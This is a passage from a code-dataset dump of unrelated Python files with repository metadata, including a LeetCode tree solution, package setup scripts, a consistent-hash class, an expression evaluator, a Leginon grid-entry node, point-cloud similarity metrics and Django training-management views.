# print(Solution().longestUnivaluePath(
# TreeNode(5, TreeNode(4, TreeNode(1), TreeNode(1)), TreeNode(5, None, TreeNode(5)))),
# "||",
# 2
# )
print(Solution().longestUnivaluePath(
TreeNode(4, TreeNode(4, TreeNode(4), TreeNode(4)), TreeNode(4))),
"||",
3
)
"""
[시작 체크 리스트]
[] 1시간 지났으나 발상 불가 또는 아예 다른 길
[✓] 코드 50% 정도 완성
[] 1시간 보다 더 걸려서 코드 완성
[] 코드는 다 돌아가는데 효율성에서 걸림
[] 코드 완성
[완료 후 체크 리스트]
[] 아예 모르겠음
[] 중간 정도 이해함
[✓] 완벽히 이해함
""" | 20.651685 | 94 | 0.495103 | """
url: https://leetcode.com/problems/longest-univalue-path/
* 가장 긴 동일 값의 경로
동일한 값을 지닌 가장 긴 경로를 찾아라.
- Example 1
Input :
5
/ \
4 5
/ \ \
1 1 5
Output : 2
Explaination : 루트에서 오른쪽 노드 끝까지 5->5->5로 가장 긴 이동 거리가 2이다.
- Example 2
Input :
1
/ \
4 5
/ \ \
4 4 5
Output : 2
Explaination : 왼쪽 리프 노드 4에서 형제 노드 4까지 4->4->4로 가장 긴 이동 거리가 2이다.
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
result: int = 0
def longestUnivaluePath(self, root: TreeNode) -> int:
def DFS(node):
if not node:
return 0
left = DFS(node.left)
right = DFS(node.right)
if node.left and node.val == node.left.val:
left += 1
else:
left = 0
if node.right and node.val == node.right.val:
right += 1
else:
right = 0
# 거리를 계산하기 위해 + 연산
self.result = max(self.result, left + right)
# 상태 값은 둘 중 더 큰 것을 리턴
return max(left, right)
DFS(root)
return self.result
if __name__ == '__main__':
# print(Solution().longestUnivaluePath(
# TreeNode(5, TreeNode(4, TreeNode(1), TreeNode(1)), TreeNode(5, None, TreeNode(5)))),
# "||",
# 2
# )
print(Solution().longestUnivaluePath(
TreeNode(4, TreeNode(4, TreeNode(4), TreeNode(4)), TreeNode(4))),
"||",
3
)
"""
[시작 체크 리스트]
[] 1시간 지났으나 발상 불가 또는 아예 다른 길
[✓] 코드 50% 정도 완성
[] 1시간 보다 더 걸려서 코드 완성
[] 코드는 다 돌아가는데 효율성에서 걸림
[] 코드 완성
[완료 후 체크 리스트]
[] 아예 모르겠음
[] 중간 정도 이해함
[✓] 완벽히 이해함
""" | 788 | 35 | 71 |
f3fa924397d5ab69738e473e7a0009efe14f6f77 | 577 | py | Python | setup.py | connor9/python-draytonwiser-api | db90222eda0c5e8b4920396961da8edc815fd920 | [
"MIT"
] | 7 | 2019-04-24T08:45:09.000Z | 2021-11-26T19:43:59.000Z | setup.py | connor9/python-draytonwiser-api | db90222eda0c5e8b4920396961da8edc815fd920 | [
"MIT"
] | 1 | 2019-03-02T22:26:47.000Z | 2019-03-02T22:26:47.000Z | setup.py | connor9/python-draytonwiser-api | db90222eda0c5e8b4920396961da8edc815fd920 | [
"MIT"
] | 1 | 2021-01-07T21:35:46.000Z | 2021-01-07T21:35:46.000Z | #!/usr/bin/env python
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
version = '1.0.0'
setup(name='python-draytonwiser-api',
version=version,
description='Python API and command line tool for talking to Drayton Wiser Thermostat',
url='',
author='',
author_email='',
license='MIT',
install_requires=['requests>=2.0'],
packages=['draytonwiser'],
zip_safe=True) | 22.192308 | 93 | 0.651646 | #!/usr/bin/env python
import os
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
version = '1.0.0'
setup(name='python-draytonwiser-api',
version=version,
description='Python API and command line tool for talking to Drayton Wiser Thermostat',
url='',
author='',
author_email='',
license='MIT',
install_requires=['requests>=2.0'],
packages=['draytonwiser'],
zip_safe=True) | 0 | 0 | 0 |
c3391de09389f23314f6f47dc595a5004b17213d | 1,167 | py | Python | setup.py | ericmbell1/flowsa | d251301864289a4de42dda118c9c6da41bcf4cf0 | [
"CC0-1.0"
] | null | null | null | setup.py | ericmbell1/flowsa | d251301864289a4de42dda118c9c6da41bcf4cf0 | [
"CC0-1.0"
] | null | null | null | setup.py | ericmbell1/flowsa | d251301864289a4de42dda118c9c6da41bcf4cf0 | [
"CC0-1.0"
] | null | null | null | from setuptools import setup
setup(
name='flowsa',
version='0.0.1',
packages=['flowsa'],
package_dir={'flowsa': 'flowsa'},
package_data={'flowsa': [
"data/*.*", "output/*.*"]},
include_package_data=True,
install_requires=[
'fedelemflowlist @ git+https://github.com/USEPA/Federal-LCA-Commons-Elementary-Flow-List',
'pandas>=1.0',
'pip>=9',
'setuptools>=41',
'pyyaml>=5.3',
'pyarrow==0.15',
'requests>=2.22.0',
'appdirs>=1.4.3',
'pycountry>=19.8.18',
'xlrd>=1.2.0',
'requests_ftp==0.3.1',
'tabula-py>=2.1.1'
],
url='https://github.com/USEPA/FLOWSA',
license='CC0',
author='Wesley Ingwersen',
author_email='ingwersen.wesley@epa.gov',
classifiers=[
"Development Status :: 1 - Alpha",
"Environment :: IDE",
"Intended Audience :: Science/Research",
"License :: CC0",
"Programming Language :: Python :: 3.x",
"Topic :: Utilities",
],
description='Complies and provides a standardized list of elementary flows and flow mappings for life cycle assessment data'
)
| 29.923077 | 128 | 0.569837 | from setuptools import setup
setup(
name='flowsa',
version='0.0.1',
packages=['flowsa'],
package_dir={'flowsa': 'flowsa'},
package_data={'flowsa': [
"data/*.*", "output/*.*"]},
include_package_data=True,
install_requires=[
'fedelemflowlist @ git+https://github.com/USEPA/Federal-LCA-Commons-Elementary-Flow-List',
'pandas>=1.0',
'pip>=9',
'setuptools>=41',
'pyyaml>=5.3',
'pyarrow==0.15',
'requests>=2.22.0',
'appdirs>=1.4.3',
'pycountry>=19.8.18',
'xlrd>=1.2.0',
'requests_ftp==0.3.1',
'tabula-py>=2.1.1'
],
url='https://github.com/USEPA/FLOWSA',
license='CC0',
author='Wesley Ingwersen',
author_email='ingwersen.wesley@epa.gov',
classifiers=[
"Development Status :: 1 - Alpha",
"Environment :: IDE",
"Intended Audience :: Science/Research",
"License :: CC0",
"Programming Language :: Python :: 3.x",
"Topic :: Utilities",
],
description='Complies and provides a standardized list of elementary flows and flow mappings for life cycle assessment data'
)
| 0 | 0 | 0 |
4aef9a3d475f82ce4715b6a324d21777ae94670d | 2,102 | py | Python | kpages/consistenthash.py | leicj/kpages | 60a46af26b50b3de8678ec8532b0212c43b58374 | [
"MIT"
] | 9 | 2015-01-14T08:53:06.000Z | 2018-05-29T07:08:23.000Z | kpages/consistenthash.py | leicj/kpages | 60a46af26b50b3de8678ec8532b0212c43b58374 | [
"MIT"
] | 2 | 2015-06-02T05:48:48.000Z | 2015-06-02T05:48:48.000Z | kpages/consistenthash.py | leicj/kpages | 60a46af26b50b3de8678ec8532b0212c43b58374 | [
"MIT"
] | 4 | 2015-01-14T08:53:06.000Z | 2022-02-21T12:35:14.000Z | # -*- coding:utf-8 -*-
"""
author comger@gmail.com
Consisten hash
"""
from hashlib import md5
from bisect import bisect_right
class ConsistentHash(object):
"""
算法思路:
1. 在N个机器中、每台M个节点、N*M 个节点形成节点环
2. 计算每个机器拥有的节点Node
3. 新内容key添加时,get_node(key)获取key被分配的node;及get_host(key)获取key 被分配到的机器
* 节点的引入:保证每台机器负载均衡
"""
if __name__ == '__main__':
from random import sample
from string import letters
'''
loop = 100000
hosts = ["192.168.1.%d" % i for i in xrange(1, 10)]
ch = ConsistentHash(hosts,replicas=100)
rnd_key = lambda: "".join(sample(letters, 10))
count = {}
for i in xrange(loop):
host = ch.get_host(rnd_key())
count[host] = count[host] + 1 if host in count else 1
avg = loop / len(hosts)
for h in sorted(count.iterkeys()):
c = count[h]
print("{0:15} {1:8} {2:8.2f}%".format(h, c, float(c) / avg * 100))
if c< avg*0.6:
print("ERROR", h,c)
'''
dh = 'asdfasd'
hosts = ["192.168.1.%d" % i for i in xrange(1, 5)]
ch = ConsistentHash(hosts,replicas=10)
print(ch.get_host(dh))
| 25.325301 | 74 | 0.556137 | # -*- coding:utf-8 -*-
"""
author comger@gmail.com
Consisten hash
"""
from hashlib import md5
from bisect import bisect_right
class ConsistentHash(object):
"""
算法思路:
1. 在N个机器中、每台M个节点、N*M 个节点形成节点环
2. 计算每个机器拥有的节点Node
3. 新内容key添加时,get_node(key)获取key被分配的node;及get_host(key)获取key 被分配到的机器
* 节点的引入:保证每台机器负载均衡
"""
def __init__(self, hosts, replicas = 10):
self._hosts = {}
self._ring = []
self._length = len(hosts)*replicas
self._build(hosts, replicas)
def _build(self, hosts, replicas):
for host in hosts:
for i in xrange(replicas):
key = "{0}_{1}".format(host,i)
hsh = self._hash(key)
self._hosts[str(hsh)] = host
print(bisect_right(self._ring, hsh),hsh,host)
self._ring.insert(bisect_right(self._ring, hsh), hsh)
print(self._ring)
def _hash(self,s):
return hash(md5(s).digest()) % self._length
def get_node(self, key):
hsh = self._hash(key)
index = bisect_right(self._ring, hsh)
if index >= len(self._ring): index = 0
return self._ring[index]
def get_host(self, key):
return self._hosts[str(self.get_node(key))]
if __name__ == '__main__':
from random import sample
from string import letters
'''
loop = 100000
hosts = ["192.168.1.%d" % i for i in xrange(1, 10)]
ch = ConsistentHash(hosts,replicas=100)
rnd_key = lambda: "".join(sample(letters, 10))
count = {}
for i in xrange(loop):
host = ch.get_host(rnd_key())
count[host] = count[host] + 1 if host in count else 1
avg = loop / len(hosts)
for h in sorted(count.iterkeys()):
c = count[h]
print("{0:15} {1:8} {2:8.2f}%".format(h, c, float(c) / avg * 100))
if c< avg*0.6:
print("ERROR", h,c)
'''
dh = 'asdfasd'
hosts = ["192.168.1.%d" % i for i in xrange(1, 5)]
ch = ConsistentHash(hosts,replicas=10)
print(ch.get_host(dh))
| 805 | 0 | 142 |
69141d14f670c53a6708e678c426971f37b401ee | 1,824 | py | Python | python/2020_18_2.py | wensby/advent-of-code | 50cd7fa2d35674d868a79ac8c75be24a43267e2b | [
"MIT"
] | null | null | null | python/2020_18_2.py | wensby/advent-of-code | 50cd7fa2d35674d868a79ac8c75be24a43267e2b | [
"MIT"
] | null | null | null | python/2020_18_2.py | wensby/advent-of-code | 50cd7fa2d35674d868a79ac8c75be24a43267e2b | [
"MIT"
] | null | null | null | import sys
import operator
func_by_op = {
'*': operator.mul,
'+': operator.add
}
if __name__ == '__main__':
print(solve(sys.stdin.read()))
| 24.986301 | 75 | 0.577851 | import sys
import operator
func_by_op = {
'*': operator.mul,
'+': operator.add
}
def solve(input):
return sum(evaluate(l) for l in input.splitlines())
def evaluate(expression):
expression = expression.replace(' ', '')
if expression.isnumeric():
return int(expression)
parts = get_parts(expression)
if len(parts) == 1:
return evaluate(parts[0][1:-1])
for op in ['+', '*']:
for i, part in enumerate(parts):
if part == op:
result = func_by_op[op](evaluate(parts[i-1]), evaluate(parts[i+1]))
before = ''.join(parts[:i-1])
after = ''.join(parts[i+2:])
return evaluate(before+str(result)+after)
if len(parts) > 1:
first = evaluate(parts[0])
second = evaluate(parts[2])
if parts[1] == '+':
return evaluate(str(first + second) + ''.join(parts[3:]))
elif parts[1] == '*':
return evaluate(str(first * second) + ''.join(parts[3:]))
else:
return evaluate(parts[0])
def get_parts(expression):
part_start = None
parts = []
depth = 0
in_brackets = False
in_number = False
for i, c in enumerate(expression):
if not (in_number or in_brackets):
if c.isdigit():
in_number = True
part_start = i
elif c == '(':
depth += 1
in_brackets = True
part_start = i
else:
parts.append(c)
elif in_number:
if c in ['*', '+']:
in_number = False
parts.append(expression[part_start:i])
parts.append(c)
elif in_brackets:
if c == '(':
depth += 1
elif c == ')':
depth -= 1
if depth == 0:
parts.append(expression[part_start:i+1])
in_brackets = False
if in_number:
parts.append(expression[part_start:i+1])
return parts
if __name__ == '__main__':
print(solve(sys.stdin.read()))
| 1,608 | 0 | 69 |
614963d88fcca991bc59d21e5afd5ad6b1ff43b6 | 3,490 | py | Python | lib/python2.7/site-packages/leginon/gridentry.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | lib/python2.7/site-packages/leginon/gridentry.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | lib/python2.7/site-packages/leginon/gridentry.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | 1 | 2019-09-05T20:58:37.000Z | 2019-09-05T20:58:37.000Z | #
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from leginon import leginondata
import event
import threading
import node
import project
import gui.wx.GridEntry
| 30.614035 | 79 | 0.729513 | #
# COPYRIGHT:
# The Leginon software is Copyright 2003
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
from leginon import leginondata
import event
import threading
import node
import project
import gui.wx.GridEntry
class GridEntry(node.Node):
eventinputs = node.Node.eventinputs + [event.TargetListDoneEvent,
event.MosaicDoneEvent]
eventoutputs = node.Node.eventoutputs + [event.MakeTargetListEvent
]
panelclass = gui.wx.GridEntry.Panel
settingsclass = leginondata.GridEntrySettingsData
defaultsettings = {
'grid name': None,
}
def __init__(self, id, session, managerlocation, **kwargs):
node.Node.__init__(self, id, session, managerlocation, **kwargs)
self.projectid = self.getProjectId(session)
self.addEventInput(event.MosaicDoneEvent, self.handleGridDataCollectionDone)
self.addEventInput(event.TargetListDoneEvent,
self.handleGridDataCollectionDone)
self.start()
def publishNewEMGrid(self,newgrid):
emgridq = leginondata.EMGridData()
emgridq['name'] = newgrid
emgridq['project'] = self.projectid
try:
self.publish(emgridq, database=True)
except node.PublishError:
raise
self.settings['grid name'] = newgrid
self.logger.info('new grid inserted into the database')
def getProjectId(self,sessiondata):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.warning('Failed to associate the grid to a project: %s' % e)
return None
return projectdata.getProjectId(sessiondata)
def getGridNames(self):
gridnames = []
if self.projectid is not None:
emgridq = leginondata.EMGridData(project = self.projectid)
else:
emgridq = leginondata.EMGridData()
results = emgridq.query()
if results:
for result in results:
newname = result['name']
if newname not in gridnames:
gridnames.append(newname)
else:
self.logger.warning('Duplicated grid name "%s" not included' % newname)
return gridnames
def getEMGrid(self, gridname):
if self.projectid is not None:
emgridq = leginondata.EMGridData(project = self.projectid, name = gridname)
else:
emgridq = leginondata.EMGridData(name = gridname)
results = emgridq.query(results=1)
if results:
return results[0]
else:
return None
def makeGridData(self, gridname):
emgriddata = self.getEMGrid(gridname)
if emgriddata is None:
return None
emgridid = emgriddata.dbid
initializer = {'emgrid': emgriddata}
querydata = leginondata.GridData(initializer=initializer)
griddatalist = self.research(querydata)
insertion = 0
for griddata in griddatalist:
if griddata['insertion'] > insertion:
insertion = griddata['insertion']
initializer = {'grid ID': None, 'insertion': insertion+1,'emgrid':emgriddata}
griddata = leginondata.GridData(initializer=initializer)
self.publish(griddata, database=True)
return griddata
def submitGrid(self):
gridname = self.settings['grid name']
evt = event.MakeTargetListEvent()
evt['grid'] = self.makeGridData(gridname)
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection initiated')
return evt['grid']
def onBadEMGridName(self,e):
self.logger.error('New grid entry failed: %s' % e)
def handleGridDataCollectionDone(self, ievent):
self.panel.onGridDone()
| 2,581 | 551 | 23 |
6853cb88362b98fa5dd8b1c33bab2fb618f22e13 | 5,047 | py | Python | tofnet/pointcloud/metrics.py | victorjoos/tof2net | 068f5f08a241dbfb950251bea52fd9379466bf2f | [
"MIT"
] | null | null | null | tofnet/pointcloud/metrics.py | victorjoos/tof2net | 068f5f08a241dbfb950251bea52fd9379466bf2f | [
"MIT"
] | 8 | 2021-02-02T23:07:37.000Z | 2022-03-12T00:51:26.000Z | tofnet/pointcloud/metrics.py | victorjoos/tof2net | 068f5f08a241dbfb950251bea52fd9379466bf2f | [
"MIT"
] | 2 | 2020-10-01T08:23:24.000Z | 2020-11-09T22:01:47.000Z | import numpy as np
from numpy.linalg import norm
from shapely.geometry import Polygon
from copy import deepcopy
import open3d
from tofnet.pointcloud.utils import rotate, transform_with_conf
from tofnet.pointcloud.visualize import visualize_pointcloud
from tofnet.annotations.segmentation import find_segmentation, find_z
def floor_similarity(ground_cfg, pred_cfg, eps=1.e-8):
"""Uses cosine similarity to compare camera configs.
Arguments:
ground_cfg: ground truth config containing a "camera" section with
inclination and lateral_inclination
pred_cfg: prediction (cfr ground_cfg)
eps: epsilon value for cosine similarity metric
Returns:
similarity: cosine similarity
"""
normal = np.array([1,1,1])
ground_vec = _rotate_from_cfg(ground_cfg, normal)
pred_vec = _rotate_from_cfg(pred_cfg, normal)
similarity = np.degrees(np.arccos(np.clip(np.dot(ground_vec, pred_vec) / max(norm(ground_vec)*norm(pred_vec), eps), -1,1)))
return similarity
def bed_similarity(ground_cfg, pred_cfg):
"""Compute 2d IoU for the bed, with common camera config."""
raise NotImplementedError()
def bprojIoU(gt_cfg, pred_cfg):
""" Computes the bounding box IoU from 2 different configs while accounting for
differences in floor rotation
"""
from shapely import geometry
res = []
for cfg in [gt_cfg, pred_cfg]:
height = cfg["camera"].get("height", 2.6)
angles = (
180-cfg["camera"]["inclination"], cfg["camera"]["lateral_inclination"],
cfg["bed"]["orientation"]
)
alpha, beta, gamma = (np.radians(a) for a in angles)
center = [cfg["bed"]["centerX"], cfg["bed"]["centerY"]]
points = get_bbox_points(cfg)
points = rotate(-gamma, points)
points += center
points3d = np.zeros((len(points), 3))
points3d[:,:2] = points
points3d[:,-1] = points3d[:,-1]-height
points3d = rotate(-beta, points3d, axis='y')
points3d = rotate(-np.pi, points3d, axis='z')
points3d = rotate(-alpha, points3d, axis='x')
res.append(points3d)
gt_points, pred_points = res
# compute floor normal
N = np.cross(gt_points[1,:]-gt_points[0,:], gt_points[3,:]-gt_points[0,:])
d = N@gt_points[0,:]
# project pred on that plane
T = (d - pred_points@N)/(N@N)
projected_pred_points = pred_points + np.expand_dims(T, axis=-1)*np.expand_dims(N, axis=0)
# compute iou
gt_poly = geometry.Polygon(gt_points[:,:2])
pr_poly = geometry.Polygon(projected_pred_points[:,:2])
iou = gt_poly.intersection(pr_poly).area/gt_poly.union(pr_poly).area
return iou
def cIoU(gt_mask, pred_mask, c):
""" Computes the image-wise pixel-based IoU
"""
pok = pred_mask==c
gok = gt_mask==c
tp = np.sum(gok & pok)
fp = np.sum((~gok) & pok)
fn = np.sum(gok & (~pok))
return tp/(tp+fn+fp)
def full_similarity(pcd, gt_cfg, pred_cfg, bed_class=2, sample=None, use_z=False):
"""Compute point-set IoU to have a complete view of bbox similarities."""
gt_pcd = np.nan_to_num(deepcopy(pcd)["points"])
pred_pcd = np.nan_to_num(deepcopy(pcd)["points"])
# Pixel IoU
## Project pred_bed on pred_floor -> pred_rect
shape = pcd["shape"][::-1]
gt_pcd = transform_with_conf(gt_pcd, gt_cfg, shape)
pred_pcd = transform_with_conf(pred_pcd, pred_cfg, shape)
if use_z:
gt_z = min(find_z(gt_pcd, end=1.4)+0.2, 1.35)
mask_z = min(find_z(pred_pcd, end=1.4)+0.2, 1.35)
else:
gt_z, mask_z = 1.35, 1.35
## Annotate pixels -> compare -> IoU
gt_mask = find_segmentation(gt_pcd, gt_cfg["bed"]["width"], gt_cfg["bed"]["length"], z=gt_z)
pred_mask = find_segmentation(pred_pcd, pred_cfg["bed"]["width"], pred_cfg["bed"]["length"], z=mask_z)
## Rotation cossim
cossim = np.degrees(np.arccos(np.cos(np.radians(
gt_cfg["bed"]["orientation"] - pred_cfg["bed"]["orientation"]
))))
err_center = np.sqrt(
(gt_cfg["bed"]["centerX"] - pred_cfg["bed"]["centerX"])**2 +
(gt_cfg["bed"]["centerY"] - pred_cfg["bed"]["centerY"])**2
)
err_len = gt_cfg["bed"]["length"] - pred_cfg["bed"]["length"]
err_width = gt_cfg["bed"]["width"] - pred_cfg["bed"]["width"]
divers_errors = (cossim, err_center, err_len, err_width)
iou_proj = bprojIoU(gt_cfg, pred_cfg)
pnts = pred_pcd[pred_mask==bed_class]
pnts = np.mean(np.linalg.norm(pnts, axis=-1))
return (0, iou_proj), divers_errors, pred_mask, gt_mask, pnts | 36.309353 | 127 | 0.640182 | import numpy as np
from numpy.linalg import norm
from shapely.geometry import Polygon
from copy import deepcopy
import open3d
from tofnet.pointcloud.utils import rotate, transform_with_conf
from tofnet.pointcloud.visualize import visualize_pointcloud
from tofnet.annotations.segmentation import find_segmentation, find_z
def _rotate_from_cfg(cfg, vec):
angles = (
180-cfg["camera"]["inclination"], cfg["camera"]["lateral_inclination"]
)
alpha, beta = (np.radians(a) for a in angles)
vec = rotate(alpha, vec, axis='x')
vec = rotate(np.pi, vec, axis='z')
vec = rotate(beta, vec, axis='y')
return vec
def floor_similarity(ground_cfg, pred_cfg, eps=1.e-8):
"""Uses cosine similarity to compare camera configs.
Arguments:
ground_cfg: ground truth config containing a "camera" section with
inclination and lateral_inclination
pred_cfg: prediction (cfr ground_cfg)
eps: epsilon value for cosine similarity metric
Returns:
similarity: cosine similarity
"""
normal = np.array([1,1,1])
ground_vec = _rotate_from_cfg(ground_cfg, normal)
pred_vec = _rotate_from_cfg(pred_cfg, normal)
similarity = np.degrees(np.arccos(np.clip(np.dot(ground_vec, pred_vec) / max(norm(ground_vec)*norm(pred_vec), eps), -1,1)))
return similarity
def bed_similarity(ground_cfg, pred_cfg):
"""Compute 2d IoU for the bed, with common camera config."""
raise NotImplementedError()
def get_bbox_points(cfg):
l, w = cfg["bed"]["length"]/2, cfg["bed"]["width"]/2
points = np.array([[l,w],[l,-w],[-l,-w],[-l,w],[l,w]])
return points
def bprojIoU(gt_cfg, pred_cfg):
""" Computes the bounding box IoU from 2 different configs while accounting for
differences in floor rotation
"""
from shapely import geometry
res = []
for cfg in [gt_cfg, pred_cfg]:
height = cfg["camera"].get("height", 2.6)
angles = (
180-cfg["camera"]["inclination"], cfg["camera"]["lateral_inclination"],
cfg["bed"]["orientation"]
)
alpha, beta, gamma = (np.radians(a) for a in angles)
center = [cfg["bed"]["centerX"], cfg["bed"]["centerY"]]
points = get_bbox_points(cfg)
points = rotate(-gamma, points)
points += center
points3d = np.zeros((len(points), 3))
points3d[:,:2] = points
points3d[:,-1] = points3d[:,-1]-height
points3d = rotate(-beta, points3d, axis='y')
points3d = rotate(-np.pi, points3d, axis='z')
points3d = rotate(-alpha, points3d, axis='x')
res.append(points3d)
gt_points, pred_points = res
# compute floor normal
N = np.cross(gt_points[1,:]-gt_points[0,:], gt_points[3,:]-gt_points[0,:])
d = N@gt_points[0,:]
# project pred on that plane
T = (d - pred_points@N)/(N@N)
projected_pred_points = pred_points + np.expand_dims(T, axis=-1)*np.expand_dims(N, axis=0)
# compute iou
gt_poly = geometry.Polygon(gt_points[:,:2])
pr_poly = geometry.Polygon(projected_pred_points[:,:2])
iou = gt_poly.intersection(pr_poly).area/gt_poly.union(pr_poly).area
return iou
def cIoU(gt_mask, pred_mask, c):
""" Computes the image-wise pixel-based IoU
"""
pok = pred_mask==c
gok = gt_mask==c
tp = np.sum(gok & pok)
fp = np.sum((~gok) & pok)
fn = np.sum(gok & (~pok))
return tp/(tp+fn+fp)
def full_similarity(pcd, gt_cfg, pred_cfg, bed_class=2, sample=None, use_z=False):
"""Compute point-set IoU to have a complete view of bbox similarities."""
gt_pcd = np.nan_to_num(deepcopy(pcd)["points"])
pred_pcd = np.nan_to_num(deepcopy(pcd)["points"])
# Pixel IoU
## Project pred_bed on pred_floor -> pred_rect
shape = pcd["shape"][::-1]
gt_pcd = transform_with_conf(gt_pcd, gt_cfg, shape)
pred_pcd = transform_with_conf(pred_pcd, pred_cfg, shape)
if use_z:
gt_z = min(find_z(gt_pcd, end=1.4)+0.2, 1.35)
mask_z = min(find_z(pred_pcd, end=1.4)+0.2, 1.35)
else:
gt_z, mask_z = 1.35, 1.35
## Annotate pixels -> compare -> IoU
gt_mask = find_segmentation(gt_pcd, gt_cfg["bed"]["width"], gt_cfg["bed"]["length"], z=gt_z)
pred_mask = find_segmentation(pred_pcd, pred_cfg["bed"]["width"], pred_cfg["bed"]["length"], z=mask_z)
## Rotation cossim
cossim = np.degrees(np.arccos(np.cos(np.radians(
gt_cfg["bed"]["orientation"] - pred_cfg["bed"]["orientation"]
))))
err_center = np.sqrt(
(gt_cfg["bed"]["centerX"] - pred_cfg["bed"]["centerX"])**2 +
(gt_cfg["bed"]["centerY"] - pred_cfg["bed"]["centerY"])**2
)
err_len = gt_cfg["bed"]["length"] - pred_cfg["bed"]["length"]
err_width = gt_cfg["bed"]["width"] - pred_cfg["bed"]["width"]
divers_errors = (cossim, err_center, err_len, err_width)
iou_proj = bprojIoU(gt_cfg, pred_cfg)
pnts = pred_pcd[pred_mask==bed_class]
pnts = np.mean(np.linalg.norm(pnts, axis=-1))
return (0, iou_proj), divers_errors, pred_mask, gt_mask, pnts | 430 | 0 | 46 |
60e04fb4bf1ebf7c0f1ee24522888df26eb7dc5e | 7,189 | py | Python | amy/trainings/views.py | gaybro8777/amy | 3cf99aed58a0f0acf83d2645a30d8408208ccea9 | [
"MIT"
] | null | null | null | amy/trainings/views.py | gaybro8777/amy | 3cf99aed58a0f0acf83d2645a30d8408208ccea9 | [
"MIT"
] | null | null | null | amy/trainings/views.py | gaybro8777/amy | 3cf99aed58a0f0acf83d2645a30d8408208ccea9 | [
"MIT"
] | null | null | null | from django.contrib import messages
from django.db.models import (
Case,
When,
IntegerField,
Count,
F,
Sum,
Prefetch,
)
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from trainings.filters import (
TraineeFilter,
)
from trainings.forms import (
TrainingProgressForm,
BulkAddTrainingProgressForm,
BulkDiscardProgressesForm,
)
from workshops.base_views import (
AMYCreateView,
AMYUpdateView,
AMYDeleteView,
AMYListView,
RedirectSupportMixin,
PrepopulationSupportMixin,
)
from workshops.models import (
Badge,
Event,
Person,
Task,
TrainingProgress,
TrainingRequirement,
)
from workshops.util import (
get_pagination_items,
admin_required,
OnlyForAdminsMixin,
)
# ------------------------------------------------------------
# Instructor Training related views
@admin_required
| 35.068293 | 92 | 0.58826 | from django.contrib import messages
from django.db.models import (
Case,
When,
IntegerField,
Count,
F,
Sum,
Prefetch,
)
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from trainings.filters import (
TraineeFilter,
)
from trainings.forms import (
TrainingProgressForm,
BulkAddTrainingProgressForm,
BulkDiscardProgressesForm,
)
from workshops.base_views import (
AMYCreateView,
AMYUpdateView,
AMYDeleteView,
AMYListView,
RedirectSupportMixin,
PrepopulationSupportMixin,
)
from workshops.models import (
Badge,
Event,
Person,
Task,
TrainingProgress,
TrainingRequirement,
)
from workshops.util import (
get_pagination_items,
admin_required,
OnlyForAdminsMixin,
)
class AllTrainings(OnlyForAdminsMixin, AMYListView):
context_object_name = 'all_trainings'
template_name = 'trainings/all_trainings.html'
queryset = Event.objects.filter(tags__name='TTT').annotate(
trainees=Count(Case(When(task__role__name='learner',
then=F('task__person__id')),
output_field=IntegerField()),
distinct=True),
finished=Count(Case(When(task__role__name='learner',
task__person__badges__in=Badge.objects.instructor_badges(),
then=F('task__person__id')),
output_field=IntegerField()),
distinct=True),
).exclude(trainees=0).order_by('-start')
title = 'All Instructor Trainings'
# ------------------------------------------------------------
# Instructor Training related views
class TrainingProgressCreate(RedirectSupportMixin,
PrepopulationSupportMixin,
OnlyForAdminsMixin,
AMYCreateView):
model = TrainingProgress
form_class = TrainingProgressForm
populate_fields = ['trainee']
def get_initial(self):
initial = super().get_initial()
initial['evaluated_by'] = self.request.user
return initial
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['form'].helper = context['form'].create_helper
return context
class TrainingProgressUpdate(RedirectSupportMixin, OnlyForAdminsMixin,
AMYUpdateView):
model = TrainingProgress
form_class = TrainingProgressForm
template_name = 'trainings/trainingprogress_form.html'
class TrainingProgressDelete(RedirectSupportMixin, OnlyForAdminsMixin,
AMYDeleteView):
model = TrainingProgress
success_url = reverse_lazy('all_trainees')
def all_trainees_queryset():
def has_badge(badge):
return Sum(Case(When(badges__name=badge, then=1),
default=0,
output_field=IntegerField()))
return (
Person.objects
.annotate_with_instructor_eligibility()
.prefetch_related(
Prefetch(
'task_set',
to_attr='training_tasks',
queryset=Task.objects.filter(role__name='learner',
event__tags__name='TTT')
),
'training_tasks__event',
'trainingrequest_set',
'trainingprogress_set',
'trainingprogress_set__requirement',
'trainingprogress_set__evaluated_by',
).annotate(
is_swc_instructor=has_badge('swc-instructor'),
is_dc_instructor=has_badge('dc-instructor'),
is_lc_instructor=has_badge('lc-instructor'),
is_instructor=Sum(
Case(
When(
badges__name__in=Badge.INSTRUCTOR_BADGES,
then=1
),
default=0,
output_field=IntegerField()
)
),
).order_by('family', 'personal')
)
@admin_required
def all_trainees(request):
filter = TraineeFilter(
request.GET,
queryset=all_trainees_queryset(),
)
trainees = get_pagination_items(request, filter.qs)
if request.method == 'POST' and 'discard' in request.POST:
# Bulk discard progress of selected trainees
form = BulkAddTrainingProgressForm()
discard_form = BulkDiscardProgressesForm(request.POST)
if discard_form.is_valid():
for trainee in discard_form.cleaned_data['trainees']:
TrainingProgress.objects.filter(trainee=trainee)\
.update(discarded=True)
messages.success(request, 'Successfully discarded progress of '
'all selected trainees.')
# Raw uri contains GET parameters from django filters. We use it
# to preserve filter settings.
return redirect(request.get_raw_uri())
elif request.method == 'POST' and 'submit' in request.POST:
